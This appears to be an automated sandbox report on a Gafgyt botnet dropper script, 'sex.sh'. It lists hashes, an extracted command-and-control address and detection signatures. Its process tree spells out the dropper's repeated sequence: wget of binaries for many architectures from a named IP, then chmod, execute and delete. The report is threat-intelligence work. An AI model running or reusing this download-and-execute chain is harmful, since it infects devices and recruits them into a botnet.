Analysis
- max time kernel: 4s
- max time network: 131s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 04/08/2024, 13:39
Static task: static1
Behavioral task behavioral1: sample sex.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample sex.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample sex.sh, resource debian9-mipsbe-20240611-en
General
- Target: sex.sh
- Size: 1KB
- MD5: 4a5211253d90ad66dea73ffa8809bbd8
- SHA1: 27c91298804fd2e46e280d4259170e6a48e4280d
- SHA256: bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
- SHA512: a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
- Extracted: gafgyt (5.252.177.70:23)
Signatures
- Detected Gafgyt variant (1 IoC)
  resource: behavioral1/files/fstream-1.dat    yara_rule: family_gafgyt
- Executes dropped EXE (1 IoC)
  ioc: /tmp/arm61    pid: 1516    process: arm61
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification    ioc: /tmp/arm61    process: wget
Processes
- PID 1480  /tmp/sex.sh: /tmp/sex.sh
  - PID 1481  /usr/bin/wget: wget http://216.172.177.16/mips
  - PID 1491  /bin/chmod: chmod +x mips
  - PID 1492  /tmp/mips: ./mips
  - PID 1493  /bin/rm: rm -rf mips
  - PID 1494  /usr/bin/wget: wget http://216.172.177.16/mipsel
  - PID 1495  /bin/chmod: chmod +x mipsel
  - PID 1496  /tmp/mipsel: ./mipsel
  - PID 1497  /bin/rm: rm -rf mipsel
  - PID 1498  /usr/bin/wget: wget http://216.172.177.16/sh4
  - PID 1499  /bin/chmod: chmod +x sh4
  - PID 1500  /tmp/sh4: ./sh4
  - PID 1501  /bin/rm: rm -rf sh4
  - PID 1502  /usr/bin/wget: wget http://216.172.177.16/x86
  - PID 1503  /bin/chmod: chmod +x x86
  - PID 1504  /tmp/x86: ./x86
  - PID 1505  /bin/rm: rm -rf x86
  - PID 1506  /usr/bin/wget: wget http://216.172.177.16/arm61  [Writes file to tmp directory]
  - PID 1515  /bin/chmod: chmod +x arm61
  - PID 1516  /tmp/arm61: ./arm61  [Executes dropped EXE]
  - PID 1518  /bin/rm: rm -rf arm61
  - PID 1519  /usr/bin/wget: wget http://216.172.177.16/i686
  - PID 1520  /bin/chmod: chmod +x i686
  - PID 1521  /tmp/i686: ./i686
  - PID 1522  /bin/rm: rm -rf i686
  - PID 1523  /usr/bin/wget: wget http://216.172.177.16/ppc
  - PID 1524  /bin/chmod: chmod +x ppc
  - PID 1525  /tmp/ppc: ./ppc
  - PID 1526  /bin/rm: rm -rf ppc
  - PID 1527  /usr/bin/wget: wget http://216.172.177.16/586
  - PID 1528  /bin/chmod: chmod +x 586
  - PID 1529  /tmp/586: ./586
  - PID 1530  /bin/rm: rm -rf 586
  - PID 1531  /usr/bin/wget: wget http://216.172.177.16/m68k
  - PID 1532  /bin/chmod: chmod +x m68k
  - PID 1533  /tmp/m68k: ./m68k
  - PID 1534  /bin/rm: rm -rf m68k
  - PID 1535  /usr/bin/wget: wget http://216.172.177.16/dc
  - PID 1536  /bin/chmod: chmod +x dc
  - PID 1537  /tmp/dc: ./dc
  - PID 1538  /bin/rm: rm -rf dc
  - PID 1539  /usr/bin/wget: wget http://216.172.177.16/dss
  - PID 1540  /bin/chmod: chmod +x dss
  - PID 1541  /tmp/dss: ./dss
  - PID 1542  /bin/rm: rm -rf dss
  - PID 1543  /usr/bin/wget: wget http://216.172.177.16/co
  - PID 1544  /bin/chmod: chmod +x co
  - PID 1545  /tmp/co: ./co
  - PID 1546  /bin/rm: rm -rf co
  - PID 1547  /usr/bin/wget: wget http://216.172.177.16/scar
  - PID 1548  /bin/chmod: chmod +x scar
  - PID 1549  /tmp/scar: ./scar
  - PID 1550  /bin/rm: rm -rf scar
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 136KB
  MD5: 6820e48a7c8f9b287da8f0593b0a8f83
  SHA1: 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
  SHA256: eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
  SHA512: 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c
  Only one download is recorded although the script requests thirteen payloads; this matches the signatures above, which attribute a file write and a dropped-file execution to arm61 only.